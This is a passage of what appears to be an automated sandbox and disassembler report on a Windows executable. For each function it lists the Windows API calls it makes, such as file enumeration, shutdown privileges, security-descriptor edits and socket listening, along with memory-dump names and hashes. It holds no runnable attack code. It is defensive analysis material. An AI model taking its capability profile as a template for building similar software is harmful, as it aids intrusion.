                                                                                                                  • __wsplitpath.LIBCMT ref: 00403492
                                                                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                  • _wcscpy.LIBCMT ref: 004034A7
                                                                                                                  • _wcscat.LIBCMT ref: 004034BC
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0046E9F6,?,004285F5,?,?,?,004285F5), ref: 00403B08
                                                                                                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,004285F5,?,?), ref: 00403B41
                                                                                                                  • _wcscpy.LIBCMT ref: 004035A0
                                                                                                                  • _wcslen.LIBCMT ref: 00403623
                                                                                                                  • _wcslen.LIBCMT ref: 0040367D
                                                                                                                  Strings
                                                                                                                  • Unterminated string, xrefs: 00428348
                                                                                                                  • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                  • Error opening the file, xrefs: 00428231
                                                                                                                  • _, xrefs: 0040371C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                  • API String ID: 3393021363-188983378
                                                                                                                  • Opcode ID: 6e9320b1c9a88740c44ae704eaa0b06fc1adad61791c0b75f6c32838b95cac6d
                                                                                                                  • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                  • Opcode Fuzzy Hash: 6e9320b1c9a88740c44ae704eaa0b06fc1adad61791c0b75f6c32838b95cac6d
                                                                                                                  • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 1409584000-438819550
                                                                                                                  • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                  • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                                  • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                  • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                                  APIs
                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                                  • __swprintf.LIBCMT ref: 00431C2E
                                                                                                                  • _wcslen.LIBCMT ref: 00431C3A
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                  • API String ID: 2192556992-3457252023
                                                                                                                  • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                  • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                                  • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                  • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                                  APIs
                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                                  • __swprintf.LIBCMT ref: 004722B9
                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FolderPath$LocalTime__swprintf
                                                                                                                  • String ID: %.3d
                                                                                                                  • API String ID: 3337348382-986655627
                                                                                                                  • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                  • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                                  • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                  • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                                    • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 2640511053-438819550
                                                                                                                  • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                  • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                                  • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                  • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                                  • GetLastError.KERNEL32 ref: 00433414
                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                                  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                                  • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                  • API String ID: 2938487562-3733053543
                                                                                                                  • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                  • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                                  • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                  • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                                    • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                                    • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1255039815-0
                                                                                                                  • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                  • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                                  • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                  • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                                  APIs
                                                                                                                  • __swprintf.LIBCMT ref: 00433073
                                                                                                                  • __swprintf.LIBCMT ref: 00433085
                                                                                                                  • __wcsicoll.LIBCMT ref: 00433092
                                                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                                  • LockResource.KERNEL32(?), ref: 00433120
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1158019794-0
                                                                                                                  • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                  • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                                  • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                  • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1737998785-0
                                                                                                                  • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                  • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                                  • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                  • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                                  • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                                  • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                  • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                  • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                                  • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                  • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove$_strncmp
                                                                                                                  • String ID: @oH$\$^$h
                                                                                                                  • API String ID: 2175499884-3701065813
                                                                                                                  • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                                                                                  • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                                                                                                                  • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                                                                                  • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                                                                                                                  APIs
                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                                  • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
